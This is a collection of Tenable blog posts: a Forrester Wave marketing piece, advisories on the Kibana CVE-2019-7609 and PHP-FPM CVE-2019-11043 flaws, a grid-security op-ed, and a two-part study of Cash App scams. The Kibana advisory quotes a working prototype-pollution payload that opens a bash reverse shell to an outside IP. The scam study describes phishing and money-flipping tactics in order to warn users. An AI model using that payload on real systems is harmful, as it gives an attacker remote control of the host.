The company is top-ranked in strategy and current offering.

Tenable was among 13 select companies invited by Forrester to participate in its October 17, 2019, Forrester Wave™ evaluation, Vulnerability Risk Management, Q4 2019. In this evaluation, Tenable was cited as a Leader in Vulnerability Risk Management (VRM).

The report evaluates solutions that help customers prioritize remediation efforts based on criteria including asset criticality, vulnerability severity and risk-based prioritization, among others. Tenable received the highest scores among all 13 vendors in the current offering category and in the strategy category and was among the top-ranked in the market presence category. In addition, we received the highest score (5.0) in 10 of the 14 evaluation criteria.

Among the report’s findings:

• Tenable executes on its vision to build the single-source-of-truth platform for VRM. 
• Part of Tenable’s strong strategy relies on translating data to provide business insight to provide prioritization.
• Its Vulnerability Priority Rating (VPR) technology surpasses standard CVSS scores as a way to dynamically prioritize risk within an environment. 
• Their reporting capabilities allow you to break out by line of business and trend over time, in addition to the ability to compare your security posture to your industry and population. 

The Forrester Wave™: Vulnerability Risk Management, Q4 2019, evaluated vendors in three high-level categories: 

• Current offering - Tenable had the highest score possible across five criteria used in this category, including vulnerability enumeration, asset criticality, vulnerability severity, risk-based prioritization and metrics and reporting. 
• Strategy - We received the top scores possible in this category in the product vision, execution roadmap and commercial model criteria.
• Market presence - Tenable received the highest score possible in the criteria used in this category, which includes the number of clients and product revenue.

We believe Tenable’s ranking among VRM vendors demonstrates the value of our platform and reinforces our vision of providing organizations with a cybersecurity system of record to help manage and measure cyber risk. 

Our customers agree. In a recent blog post about how his organization uses Tenable, Sentara Healthcare’s CISO Dan Bowden notes: “In the climate today, there's so much focus from society about companies doing better managing risk, every leadership team and every board in every organization wants to be part of the story of fixing the problem. If you can give them good data about exposure, which things do we really need to do, they understand the data, they can relate to the data. They want to be part of the story to help you solve the problem and manage risk better.”

Indeed, our customers tell us that risk-based prioritization is important not only in helping practitioners determine which vulnerabilities to fix first, but also in communicating with business-side colleagues. For example, according to a recent blog post, Emerson uses Tenable.io to provide context for cybersecurity conversations throughout the organization, including in the executive suite. “It's important for them to see trending...and it's important for them to see results,” said Jon Brown,  the company’s Manager of Application and Product Security Testing. “They need to be able to understand where [you’re] at and where you're going and why you are going there.”

This designation as a Leader in the Q4 2019 Vulnerability Risk Management Forrester Wave adds to our growing list of awards and distinctions. Tenable.io was recognized as the Best Vulnerability Management Solution at the 2019 SC Awards. We released our groundbreaking Predictive Prioritization capabilities in Tenable.io and Tenable.sc earlier this year, and we are extending Tenable Lumin to support Tenable.sc by the end of 2019 as the result of explosive demand. As the Forrester report notes, “On its roadmap, Tenable has outlined plans to make improvements to its core VM product, its cyber exposure analytics product, Lumin, and its partner ecosystem. Tenable is a great choice for enterprises looking for a VRM vendor that provides strong prioritization and reporting across device types.”

Learn more:

• Download The Forrester Wave™: Vulnerability Risk Management, Q4 2019 here.

An exploit script for the previously patched Kibana vulnerability is now available on GitHub.

Background

On October 21, an exploit script was published to GitHub for a patched vulnerability in Kibana, the open-source data visualization plugin for Elasticsearch. Elasticsearch and Kibana are part of the popular Elastic Stack (also known as ELK Stack), a series of open-source applications used for centralized log management.

Analysis

CVE-2019-7609 is an arbitrary code execution vulnerability in Kibana’s Timelion visualizer. The vulnerability was patched in February 2019.

According to Elastic’s advisory for the flaw, an attacker capable of accessing the Timelion application “could send a request that will attempt to execute javascript code” that could result in the attacker executing arbitrary commands on the host under the same permissions as the vulnerable Kibana process.

On October 14, Michał Bentkowski, a security researcher at Securitum, presented a talk at OWASP Poland Day about Prototype Pollution. Bentkowski’s slides from the presentation were published to slides.com, and include his research on CVE-2019-7609, along with proof-of-concept (PoC) code exploiting the vulnerability.

On October 16, Alibaba Cloud security researcher Henry Chen tweeted out the PoC from Bentkowski’s slides:

POC: kibana < 6.6.0

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')https://t.co/hK9MpwIPaDpic.twitter.com/Oqcu52oKgs

— Henry Chen (@chybeta) October 16, 2019

Bentkowski’s research became the basis for the exploit script published earlier this week. The exploit script is designed to identify whether or not a target version of Kibana is vulnerable. If vulnerable, the exploit script will attempt to create a reverse shell on the vulnerable host. 

The following table contains information about the vulnerable versions of Kibana based on the information in the Elastic advisory.

A BinaryEdge search reveals more than 4,200 publicly accessible Kibana instances. The most prominent versions of Kibana are vulnerable versions, such as 6.2.4, 6.3.2 and 6.3.1.

Proof of concept

As mentioned, a PoC was published in a slide deck from security researcher Michał Bentkowski and included as part of the exploit script published to GitHub. 

Solution

Administrators and users of the Elastic Stack (or ELK Stack) should upgrade to Kibana versions 5.6.15 or 6.6.1 and above. However, if upgrading is not feasible at this time, modify the kibana.yml configuration file to disable Timelion by setting timelion.enabled to false.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability can be found here.

Get more information 

• Elastic Stack Advisory (February 2019)
• Slides: Prototype Pollution in Kibana
• Exploit Script for CVE-2019-7609

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

In recent years, the increased availability of IoT and OT devices has enabled the electric grid to operate more efficiently. But, these devices also expand the cyber threat landscape, creating prime targets for cybercriminals.

Connected devices – and the infrastructure that supports them – open the grid to hackers. And, the potential consequences are serious. For example, a major disruption to the grid could inconvenience millions of users, threaten the safety of hospital patients or throw global markets into chaos.

What’s needed to secure the grid?

Utilities across the United States are keenly aware of these threats. And, they have made significant investments to secure the grid, including bigger security departments and expensive cybersecurity tools.

Vulnerability management is key to protecting the grid

However, another key piece of protecting the grid is vulnerability management. Utilities must implement strong vulnerability management practices to make more efficient use of their resources and tools.

Identifying, prioritizing and mitigating vulnerabilities in a strategic manner is incredibly important as utilities manage an increasingly connected infrastructure of IT, IoT and OT devices. Without proactive management of the onslaught of threats to the grid, utilities are sitting ducks, susceptible to potentially significant attacks.

Congress is taking action to promote cybersecurity for electric utilities

Congress has taken note and introduced several bills this year to address grid security. Perhaps the most impactful is the Enhancing Grid Security through Public-Private Partnerships Act, introduced by Rep. Jerry McNerney (D-CA) and Rep. Bob Latta (R-OH) in the House and Sen. Cory Gardner (R-CO) and Sen. Michael Bennet (D-CO) in the Senate. This legislation seeks to encourage partnerships among the Department of Energy (DoE), state regulatory authorities, industry stakeholders and other federal agencies to promote and advance physical security and cybersecurity for electric utilities – keeping the lights on and our economy moving. 

Public-private partnerships are vital to grid security

Public-private partnerships are vital to improved coordination and security. The federal government can convene stakeholders to set standards that will encourage both the public and private sectors to step up their security practices. The private sector has a tremendous amount of expertise and tools to share with its federal and state partners. And, encouraging the federal government to make use of the private sector’s resources is a common-sense starting point in the ongoing fight to secure the electric grid.

We’ve already seen some success with public-private partnerships. For example, the DoE works with the private sector to improve grid security at its national labs, which are hotbeds of innovative projects that have developed supercomputers, improved grid resiliency and more.

But, we can do more. For instance, the DoE can leverage and promote the excellent work already being done at the NIST National Cybersecurity Center of Excellence (NCCoE), which brings together government, industry and academia to address the most pressing cybersecurity issues for various industries.

Using the comprehensive cybersecurity solutions created through NCCoE energy-sector projects would go a long way to help the utility industry scan for vulnerabilities created by their increasingly connected technology – and, thus, better manage their cyber posture.

At Tenable, we work with our partners in the federal government every day to help improve their cybersecurity standing. Streamlining these relationships would unleash the full potential of these partnerships. 

The time to act is now. Recent legislation is a strong start to securing the grid and keeping the economy moving. As cybersecurity professionals, lawmakers and federal government employees, we can have a tremendous impact on our nation’s security.

Scammers target vulnerable Cash App users on Twitter and Instagram through fake requests, money flipping and mobile application referrals, while YouTube videos promote fake Cash App generators. Here’s what you need to know. 

Cash App, the popular person-to-person (P2P) payment service application from Square, has been steadily growing since its debut in late 2013. The service’s growth has been fuelled by a promotion marketing campaign offering cash giveaways to those who engage with the brand on various social media platforms. The success of these promotions, in turn, is emboldening an army of scammers who employ a variety of cons to separate social media users from their hard-warned cash.

A look at the numbers makes it easy to see why Cash App is such a promising target for scammers. According to an August 2019 MarketWatch article, Cash App received a whopping 2.4 million downloads in July 2019. The same article notes Cash App has been downloaded 59.8 million times since its 2013 launch, outpacing its biggest competitor, Venmo, which has been downloaded 52.7 million times. 

Music has played a role in fueling Cash App’s popularity, as 200 rap artists have namechecked the app in song lyrics and used the app to give money to fans, whether “just because,” as Lil B did, or as part of a giveaway promotion for scoring a number one album, as Travis Scott did.

Some consumer brands have also activated marketing campaigns using the service. For example, Burger King began its Whopper Loans promotion by teasing a giveaway using Cash App.

got student loans? what's ur $cashtag?

— Burger King (@BurgerKing) May 22, 2019

This two-part series details the practices I uncovered while researching these scammers from July to September 2019. This research is not meant to be a comprehensive overview of all such scams; rather it’s an analysis of behavioral trends among a group of scammers targeting the popularity and interest around one particular application. 

Here, in part one, I explore how Cash App’s soaring popularity is attracting opportunistic scammers and their methods of operation on Twitter and Instagram. In part two, I provide further details on the tactics used by Cash App scammers on Instagram, as well as examine videos hosted on YouTube, which claim to provide ways to earn “free money” and “hack” Cash App. In addition, I provide guidance and advice on how users of the P2P payment service can avoid being conned.  

#CashAppFriday and #SuperCashAppFriday Giveaways

Since 2017, Square has been running a weekly giveaway to Cash App users under the hashtag #CashAppFriday and, in one instance, #CashAppWednesday. The premise is very simple: Cash App will post about the giveaway every Friday using #CashAppFriday or #SuperCashAppFriday on Instagram and Twitter, and users can enter the giveaway by sharing to their story, retweeting or replying to the posts with their $cashtag, a unique ID for users and businesses to make it easier to send and receive money. The company randomly selects winners and deposits an unspecified amount of money into their Cash App accounts. More recently, the company launched another giveaway called #SuperCashAppFriday, offering total prizes from $10,000 to $75,000, depositing anywhere between $100 to $500 into Cash App user accounts.

Needless to say, #CashAppFriday has been extremely popular. Each week, it is one of the top trends on Twitter, receiving thousands of tweets during each event.

On Instagram, a recent Cash App giveaway of $75,000 resulted in Instagram limiting comments on the post, showcasing just how popular these Cash App giveaways are.

Unsurprisingly, Cash App’s legitimate giveaways are a breeding ground for scammers.

Seeding #CashAppFriday Scams

The most obvious place to find Cash App scammers is in the replies to Square’s Cash App social media accounts on Twitter and Instagram during #CashAppFriday and #SuperCashAppFriday.

Cash App scammers tend to post some variation of the same theme: Giving away “X” amount of dollars to the first “Y” number of users to retweet this tweet. They’ll also ask users to reply with and/or send them a Direct Message (DM) with their $cashtags.

However, not all Cash App scammers reply directly to @CashApp on Twitter. Instead, they’ll “ride the hashtag” because Cash App’s hashtags always trend on Twitter.

In the course of my research, I’ve also encountered some Cash App scammers not using any of the Cash App hashtags whatsoever. These typically involve the same promise of a giveaway to the first X number of users who retweet and include their “cashapp name” ($cashtag).

Check The Replies

In the tweets from Cash App scammers, you’ll often find a sea of $cashtags from users in the replies, similar to what you’d find in the replies to the real @CashApp Twitter account. Interspersed through these replies, you’ll see the Cash App scammer replying with “Dm me” messages to potential victims.

Interestingly enough, some of the Cash App scammers use their other scam accounts to foster fake engagement by liking, retweeting or replying in an effort to create a sense of legitimacy around their scams.

Case in point: A Cash App scam account named “Eva” tweeted out a giveaway to the “first 900” people. In the replies to Eva, three separate Cash App scam accounts responded claiming the offer is legitimate, even including screenshots from Cash App to support their claims. A few red flags are presented here.

First, the screenshots include dollar values less than or greater than the offered amount of $900. Second, the screenshots are from the perspective of the scammer, which is unusual. This is because it says a dollar amount “was instantly deposited to your bank account,” which means money was transferred from Cash App to a bank account, not to a Cash App user. It is unusual because most of the Cash App scammers I’ve observed tend to post screenshots with examples of money being sent to unidentified users.

Finally, and most importantly, look closely at the dollar amount being offered and the number of users eligible for the giveaway. In this case, it is $900 for 900 users, which equals $810,000. When Cash App itself does giveaways, it normally offers a more modest sum of money — as low as $5 per person in some cases. Even in promotions where the giveaway amounts are higher — such as a #SuperCashAppFriday — the offer would never exceed $10,000-$75,000 in total. The math just doesn’t add up, and in most Cash App scam giveaways, it never will.

There are even some instances where different Cash App scammers will encroach on the territory of other Cash App scammers, as seen in the screenshot above. 

In addition to seeing such screenshots of Cash App transactions, I’ve also seen some Cash App scammers favorite and retweet videos and images of people holding large sums of cash, claiming they received them from the Cash App scammer. While not confirmed, I suspect these accounts are also owned and operated by the scammers.

Cash Flipping: A Timeless Con

Behind these so-called Cash App scam giveaways, there’s a timeless con at work. It is illustrated in an Abbott and Costello skit, called “Two Tens for a Five,” which begins with an unsuspecting Costello being asked by Abbott if he can exchange two $10 bills for his $5 bill, resulting in a $15 profit for Abbott and a $15 loss for Costello.

In the case of Cash App scams, they follow the blueprint of what’s called money (or cash) flipping. The victims are asked by the scammers to put up a certain amount of money, which can range from as little as $10 to as much as $1,000. The scammers claim they can modify (or “flip”) the transaction after it’s been posted because they have some “software” or because they are a customer service representative, allowing them to change the value in whatever payment service they use (in this case, Cash App). All they ask is that the victim provides them with a small cut for their “services.”

Money flipping isn’t new to social media; it’s been pervasive on Twitter, Facebook, Instagram and Snapchat for years. What makes this particular form of money flipping so nefarious and successful is that it capitalizes on a legitimate giveaway proposition from a reputed company — Square and its Cash App product — and then victimizes people who are hoping to be selected in this legitimate giveaway. In a perverse indicator of their success, it seems the legitimate Cash App giveaways are fueling other money flipping scammers to switch over to Cash App as their product of choice.

It Goes Down In The DM 

When users are asked to DM these Cash App scammers, they’ll be told that there’s one more required step before they receive the giveaway prize.

The Cash App scammers claim to be “customer service representatives” at Cash App and talk about how they can “flip transactions from my system.” They then talk about example dollar amounts that can be flipped to higher amounts, starting at the lower end (e.g. $50), all the way up to a larger amount (e.g. $100). They also claim they have proof. If pressed with further questions, the scammers will stop responding.

If a user agrees to the con, they’ll be asked to send the initial payment to the Cash App scammer. The reality is that the Cash App scammer will receive the payment and never respond back to the user after they’ve received the initial payment, leaving the user out in the cold. However, I speculate that in some instances, certain Cash App scammers may offer a smaller “flip” in order to gain the trust of the user first. For example, they may actually deliver on a promise to turn $2 into $20 to prove the “flip” works. It is a minimal investment from the Cash App scammer’s perspective in order to earn the trust of the victim. From there, the scammer will ask the user to try sending them a higher dollar amount, from $50 to $100. This type of trust-gaining flip is likely fairly rare; in my estimation, the majority of users will send a certain dollar amount to the Cash App scammer, never to hear from them again.

Gift Card Scammers Find New Home in Cash App Giveaways

In other cases I’ve observed, some Cash App scammers will ask the recipient to gain their trust by asking them to go to a website or a brick-and-mortar store and purchase a prepaid “gift” card.

In a 2018 article from the United States Federal Trade Commission (FTC), the agency observed a staggering 270 percent increase in the demand for gift card payments from scammers since 2015. Therefore, it is not surprising to see remnants of this trickle into the world of Cash App scams, because it’s a lot harder to trace back theft of funds from a gift card than it is to identify a Cash App scammer using the platform with an associated $cashtag and telephone number.

Abuse of Referral Bonuses

Besides gift cards, another Cash App scam involves the promise of a “blessing” in exchange for the user signing up to cashback services, like Dosh Cash, and price drop monitoring service Waldo, neither of which is  affiliated with Square’s Cash App.

Dosh Cash and Waldo incentivize referrals, offering $5 per referral for users who sign up using a referral link or code and link a credit or debit card. As seen in the tweets above, one Cash App scammer convinced a user to sign up to both services. In the DMs, you’ll see this user say “I did my part you need to do yours” and “You told me to do that with the last link and you still didn’t cash app me.” The Cash App scammer this person has engaged with has been operating this particular scheme since at least 2018.

Incoming Requests from Cash App Scammers

Typically on #CashAppFriday, Cash App will randomly send money to users replying to its tweets or Instagram posts. Users lucky enough to be recipients of a real “Cash App Blessing” will sometimes share screenshots and thank the company.

The screenshot above shows a genuine interaction from a user who actually received $5 from the real Cash App account. You can tell the requests are coming from the real Cash App account because the $cashtag here is $cashapp.

Still, that hasn’t stopped Cash App scammers from impersonating the company. Instead of sending money to unsuspecting users, the Cash App scammers will use the “request” functionality of Cash App to ask users for money for “verification” purposes.

In the example above, a user initially thought they’d received a “blessing,” but instead were asked to send $10 for “verification” in order to receive $500. The Cash App scammer in this instance used the same profile photo as the real Cash App, but did not have the same name.

In another instance, a Cash App scammer used the same “request” functionality, but their account had a different profile image and the name included a space between the “C” and “ash” in the word Cash. Cash App prevents users from assigning “Cash App” to their Full Name in an effort to squelch name impersonation. Yet, that clearly hasn’t stopped scammers from finding workarounds.

Impersonation Persists in Cash App Scams

I’ve previously reported on the phenomenon of impersonation on social media apps like TikTok. So it’s no surprise to see scammers are using impersonation tactics in Cash App scams in a few ways. The most obvious impersonators in Cash App scams are those posing as the real Cash App or claiming to be customer service representatives at Cash App.

Some impersonation accounts use official image assets from Cash App. Others use assets that are similar, but not exactly the same.

The other interesting aspect of the impersonator above is their claim to also accept payments via Apple Pay, which includes a screenshot of an Apple Cash card with over $2,000 on it. Apple Cash is Apple’s own P2P product designed to compete with Venmo and Cash App

Some impersonators claiming to be Cash App representatives use photos of real people. In the case above, this impersonator calls themselves Nickoli Foxworth. In actuality, Nickoli is using a photo of a Czechoslovakian entrepreneur named Pavol Krúpa.

No impersonation would be complete if Cash App scammers didn’t impersonate Twitter and Square CEO Jack Dorsey.

This same Jack Dorsey impersonator on Twitter was also operating their scam on Instagram, where they had gained nearly 3,000 followers. The impersonator claimed they were “hacked” at 16,000 followers, but it is more likely that Instagram removed their previous impersonation page.

Outside of so-called “Cash App Representatives” and Jack Dorsey impersonations, many of the Cash App scammers are likely using stolen photographs and images of real people to create their accounts.

For instance, one Cash App scammer was using photographs and impersonating an Instagram model named Valentina Adall.

The Cash App scammer, who had 12,000 followers, would post offers for #CashAppFriday. When users would DM them, they’d be given the same spiel about being able to alter transactions into a “larger amount” on Cash App or Apple Pay.

In this instance, the Cash App scammer is asking for $300 right off the bat, which is a lot more than most Cash App scammers ask for initially.

Valentina Adall does have a Twitter account and she specifies in her bio that it is her “ONLY account,” which implies she’s been impersonated on Twitter before.

She was made aware of the Cash App scammer’s impersonation account, sarcastically retweeting one of their tweets saying they look alike and “could be twins.”

Not all impersonations are direct impersonations. I’ve observed a Cash App scam account using photos and video content from Hollywood Dollz member Famous Ocean, but calling themselves “Essence.”

For example, the avatar image used by the Cash App scammer called “Essence” was taken from Famous Ocean’s Instagram page.

In another example, a Cash App scammer calling themselves Patrick Bowker claimed to be “blessing those in need via cashapp.”

In this case, Patrick Bowker is using an image of ex-Google CEO and Chairman Eric Schmidt.

Outside of #CashAppFriday, Cash App scammers also target giveaways not directly affiliated with Cash App but which happen to utilize Cash App as a platform to send money. Alfredo Villa, a popular YouTuber who goes by the name “Prettyboyfredo,” runs Cash App giveaways on his Twitter account for his nearly 400,000 Twitter followers. 

When people see these giveaways, they instantly respond with their $cashtags. Responding with $cashtags provides scammers with the information they need to target these unsuspecting users.

A Cash App user tweeted at @Prettyboyfredo, asking him about the giveaway and posting a screenshot of a Cash App request for $20 they received. The message said “congrats you won verify real account to get $1,000.” This is similar to the fake Cash App accounts sending incoming requests that I noted earlier.

These unaffiliated Cash App giveaways appear to be a successful endeavor, as evidenced in the image above. So even if the Cash App scammers aren’t creating impersonation Twitter accounts, they have found it much easier to simply create an impersonation account through Cash App.

Outside of direct impersonations of the Cash App brand, its CEO and notable figures, I believe it is safe to assume the majority of Cash App scammers are using stolen images and video content to create fake personas.

Cash App Phishing

During my research, I also encountered attempts at phishing Cash App users. A user named @dropyourcashtag was riding the #CashAppFriday hashtag, DMing users about winning the giveaway, sending the payment along with a link to a website, saying  “go on and receive it.”

Unlike most apps and services, Cash App does not ask for a password. Instead, it asks for an email address or phone number as the username, which triggers a request for a one-time use “login code,” also known as a one-time password (OTP). The code is delivered to the user’s email address or mobile phone, as seen in the image below.

Therefore, Cash App phishing websites will look different from a normal phishing website.

In the example above, the Cash App phishing website prefaces that the cashtag “$cash” (which isn’t affiliated with Cash App) has “initiated deposit of $1000 to your Cashapp.” 

The Cash App phishing website uses a valid Secure Sockets Layer (SSL) certificate obtained from Let’s Encrypt and asks for an email or mobile number. It is followed by a second screen, which asks the user to provide their OTP. Inputting an invalid OTP results in an error message, which implies there may be some type of verification happening to ensure the user provides their valid OTP. To safeguard my privacy during this research, I did not provide my OTP.

However, I did observe a Twitter user who proceeded to provide their information to one of these Cash App phishing websites and reached a fake webpage saying “Payment Failed.” The error message would likely trick the user into believing there was merely a technical problem in sending the so-called giveaway payment, rather than a scam.

I was able to identify at least two Cash App phishing links, both of which used the Bitly URL shortening service. Statistics from those two links showed they each received over 500 clicks, mostly from users in the United States with a few clicks from the United Kingdom, Nigeria, Philippines, Australia and Guatemala. While Cash App is available outside the United States, the giveaways for #SuperCashAppFriday and #CashAppFriday are limited to U.S. participants.

Tenable notified Cash App about our research findings prior to publication. A spokesperson for Cash App provided us with the following statement:

"We are aware of social media accounts that claim to be associated with Cash App. We have been working with Twitter and Instagram to deactivate all accounts that infringe our intellectual property rights (eg: use our name or logo without permission) or seek to take advantage of our customers.

As a reminder, the Cash App team will never ask customers to send them money, nor will they solicit a customer’s PIN or sign-in code outside of the app. Additionally, Cash App currently has only two official Twitter accounts, @cashapp and @cashsupport, both of which have blue, verified check marks. If you believe you have fallen victim to a scam, you should contact Cash App support through the app or website immediately." 

In part two of this series, I provide details on how Cash App scammers similarly operate on Instagram and explore how scammers are creating YouTube videos claiming to offer ways to earn free money through Cash App by downloading apps. Part two also includes tips and best practices to help users avoid falling for these schemes.

Cash App scammers are targeting users on Instagram and YouTube. Here’s what you need to know about their tactics — and how to avoid being conned.

In part one of our two-part series on Cash App scammers, I explored how promotional tactics used by the popular person-to-person (P2P) payment service have been co-opted by scammers, particularly on Twitter. Here, I share additional details showing how similar cons are perpetrated on Instagram, and how scammers are also creating videos on YouTube to deceive users into believing they have a way to “hack” Cash App for free money. You’ll also find tips and guidance on how to keep your hard-earned cash from falling into the wrong hands.

Instagram Cash App Scams

Cash App scams on Instagram are mostly similar to those on Twitter, with some key differences based on how users interact on each platform. 

Similar to the Twitter #CashAppFriday promotion, Instagram users hoping to win the #CashAppFriday and #SuperCashAppFriday giveaways will leave comments on Cash App Instagram posts with their $cashtag hoping to be selected.

Once again, because users are publicly sharing their $cashtags, Cash App scammers can easily target them directly.

On the same Instagram post from @CashApp, users posted about receiving incoming  requests to send $20. One user provided an example account name, $cshfridayoffical, one of a myriad of Cash App accounts impersonating Cash App on its own platform.

A user also posted an image on their profile of a request they received during a recent #CashAppFriday. The post shows an incoming request through Cash App asking for $10 to “verify real account to get $500.” So it’s clear Cash App scammers are using the same tactics outside of Twitter to steal money from Cash App users.  

How Cash App scams differ on Instagram is through the way they adapt to the platform they use. On Twitter, Cash App scammers reply to #CashAppFriday tweets from @cashapp and the hashtag itself. On Instagram, the Cash App scammers look for users commenting on @cashapp posts with their $cashtag and follow those users, hoping they’ll look at their profiles.

The usernames vary and may include keywords like “cash,” “payroll,” or “rich” in them. Some are more direct with their intentions, including variations of the word “money” and “flip” in them.

These scammers aren’t explicitly targeting Cash App. Rather, as I previously noted, these are traditional money flipping scammers who’ve seen the tremendous popularity of Cash App and the #CashAppFriday giveaways and are trying to prey on desperate users seeking quick cash. 

In the Instagram posts above, a money flipping scammer is posting photos of someone with lots of cash in hand in their vehicle to entice users. They also tease an offer of flipping “$7 into $120,” setting the entry point very low for a potential victim. Finally, they have an example of a series of “Cashapp Flips” through which users can turn anywhere from $10 to $100 into $100 to $1,000. However, potential victims won’t see such returns.

In another Instagram Cash App scam profile, the scammer cautions users to have “at least $25” in Cash App or “any other bank acc.” This profile also includes conversations and images where the scammer supposedly sends money to users. While unconfirmed, it is suspected that these images were either doctored or involved other accounts the scammer operates.

While I did not engage with these Instagram Cash App scammers, since they operate under the model of money or cash flips, it’s clear how the conversation would go. They would ask for an initial payment, claim they have the ability to modify the transactions in the system, ask to be given a cut from the “flip” they perform and mention they have proof that their operation is legit. Clearly, the operation isn’t legit and they would run off with whatever money they would receive.

To underscore how pervasive the Cash App scams are on Instagram, the official Cash App Instagram account recently posted an image with a caption stating the service will “never request money from you.” 

YouTube Cash App Scams

Despite the persistence of these Cash App scams on social media, there is another area of intrigue when it comes to Cash App scams, this time on services like YouTube.

Unlike the money or cash flipping scams on Twitter and Instagram, Cash App scams promoted through YouTube focus on so-called Cash App Money Generators or Cash App Hacks.

Searching for certain keywords relating to free money and Cash App lead to videos claiming to promote a “secret trick” or hacks to get free money on Cash App.

Digging into these videos, they all follow the same basic script:

1. Voiceover of the video creator with the camera focused on their mobile phone.
2. They may open their Cash App to reveal $0 in funds.
3. They open a web browser and tell the viewer which website they need to visit in order to get the “free money.”
4. The websites may be solely focused on Cash App or have references to other apps and services, requiring the user to “search” for the Cash App page.
5. The video creator shows the viewer a website asking for a Cash App “ID” ($cashtag) and the amount of money they wish to receive, which can range from $10 to $999.
6. The websites claim to be starting the process, but are ultimately interrupted because they require “human verification.”
7. The websites redirect to a page that asks the user to install up to two mobile applications and run them for a specific time (30 seconds) or to play a series of games (e.g. Solitaire).
8. After completing these steps, the websites claim the user will receive the requested funds.
9. The video creators have doctored the video to show their Cash App incrementing the value of their available funds or merely increasing the money on the screen to make it appear as though the generator worked and they received the money they requested.

This approach mirrors what I’ve previously seen in scams targeting TikTok users seeking free followers and likes. The only difference is that they’re being promoted on YouTube.

The image above is just one example of a myriad of Cash App “free money” generator/hack websites designed to drive users to “human verification” pages, which require users to fill out surveys (on desktop) and install mobile applications (on mobile).

The “Are you a robot” reference leverages Google’s reCAPTCHA logo to masquerade as a true “verification” service. Because most internet users are accustomed to reCAPTCHA implementations across the web, they might very well believe this is a legitimate verification request. In reality, it’s part of a cost-per-install (CPI) program, where the website creator uses specially crafted links with an affiliate identifier (affid) associated with their own account. This way, when a user installs one of these mobile applications and runs them for 30 seconds, they’ll be paid a small sum of money (less than $1) per install. 

In the case of these YouTube videos, it is possible the video authors have created the websites themselves, so they’re earning the affiliate money from the CPI programs. However, I’ve not been able to independently verify whether or not this is the case. Typically, CPI programs pay a very small amount for a successful conversion, often less than $1. They’re less lucrative than other affiliate programs, such as those promoting adult dating websites. 

Safety Tips for Cash App Users

While legitimate giveaways from Cash App and artists and celebrities may pique your interest, it is important to proceed with caution, because Cash App scammers are like sharks in a pond.

If you’re a Cash App user or someone interested in these giveaways or Cash App generators, here are some tips to help keep you safe when using these platforms and the Cash App service.

• Neither Cash App nor any artist or celebrity offering to give away money will ever ask you to send money as a form of verification. If you receive an incoming request in your Cash App for money to verify you’re real, ignore the request and report the user.
• Be skeptical of posts on Twitter and Instagram promoting #CashAppFriday or other giveaways. Do the math; if it sounds too absurd ($900 for the first 900 people) then it will turn out to be a scam. Even if it is a modest sum ($20 for the first 100 people), be skeptical.
• Flipping money isn’t real. There is no program or method to alter transactions to increase the value within Cash App or any other person-to-person payment service. If the proof offered to you is flipping $2 to $20, know that the Cash App scammer is using their own stash of funds to gain your trust to steal a higher sum of money from you.
• If you receive a message from someone saying you’ve won a Cash App giveaway and they include a link to a website that asks you to log in to your Cash App, it is almost certainly a phishing site. Do not enter your mobile number or provide your “login code” into any website. Instead of clicking on a link in a DM or a social media post, visit the real Cash App website (https://cash.app) or check your mobile application instead.
• There is no such thing as a Cash App generator or Cash App hack that requires you to install a mobile application to get free money. You’re being used as a pawn to help a scammer earn money off the apps you install on your mobile phone.

Additionally, it is important to review your Cash App settings to fend off scammers. This includes ensuring you’ve enabled “Security Lock,” which requires your Cash App pin in order to transfer funds. Keep your Cash App pin to yourself and never share it with any person or any website.

Finally, you can restrict who has the ability to send you an incoming request for money to “Contacts Only,” which will thwart the Cash App scammers impersonating Cash App and other celebrities through incoming requests, asking you to send them money for verification purposes. Even with this setting enabled, you’ll still be able to send and receive money through Cash App normally.

As the old adage goes, if it sounds too good to be true, it probably is. In the case of Cash App giveaways, most of the time, it definitely is.

Web servers using nginx and PHP-FPM are vulnerable to this flaw under certain conditions.

Background

On October 22, security researcher Omar Ganiev published a tweet regarding a “freshly patched” remote code execution vulnerability in PHP-FPM, the FastCGI Process Manager (FPM) for PHP. The tweet includes a link to a GitHub repository containing a proof of concept (PoC) for the vulnerability.

Freshly patched RCE in PHP-FPM:https://t.co/kaVsCStBJx
Exploit:https://t.co/VLmhxMWVxo
Many nginx+PHP configurations vulnerable, watch out!

— BECHED (@ahack_ru) October 22, 2019

Analysis

CVE-2019-11043 is an env_path_info underflow flaw in PHP-FPM’s fpm_main.c. The vulnerability was first reported to the PHP bug-tracker by security researcher Emil Lerner on September 26, 2019. Lerner also credits Andrew Danau, security researcher at Wallarm, who identified the “anomaly” during a Capture The Flag competition in September 2019, and Ganiev for helping to finalize the php.ini options for the PoC.

According to Lerner, under certain configurations where a web server is using nginx and PHP-FPM, the vulnerability can be exploited to gain remote code execution. These configurations require a certain set of preconditions in order for it to be exploitable. These preconditions include:

1. The nginx location directive forwards requests to PHP-FPM
2. The fastcgi_split_path_info directive is present and includes a regular expression beginning with a ‘^’ symbol and ending with a ‘$’ symbol
3. The fastcgi_param directive is used to assign the PATH_INFO variable
4. There are no checks in place to determine whether or not a file exists (e.g., using try_files or an if statement)

It appears such configurations and preconditions are not uncommon. According to a recent tweet, Nextcloud, the open-source file hosting software, originally recommended the vulnerable nginx configuration in their installation documentation. Nextcloud has since changed the documentation following the tweet that reported it.

NOTICE THIS TWEET : https://t.co/x68iNP6F7u

recommended configuration for nextcloud with nginx and php-fpm is vulnerable...#bugbounty#bugbountytip#bugbountytipspic.twitter.com/cAqptRR0Ez

— Henry Chen (@chybeta) October 24, 2019

The PoC script included in the GitHub repository can query a target web server to identify whether or not it is vulnerable by sending specially crafted requests. Once a vulnerable target has been identified, attackers can send specially crafted requests by appending “?a=” in the URL to a vulnerable web server.

Proof of concept

The PoC script is available in the following GitHub repository.

Solution

On October 24, PHP 7.3.11 (current stable) and PHP 7.2.24 (old stable) were released to address this vulnerability along with other scheduled bug fixes. Those using nginx with PHP-FPM are encouraged to upgrade to a patched version as soon as possible.

If patching is not feasible, the suggested workaround is to include checks to verify whether or not a file exists. This is achieved either by including the try_files directive or using an if statement, such as if (-f $uri).

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.

Get more information

• PHP Bug-Tracker Entry for CVE-2019-11043
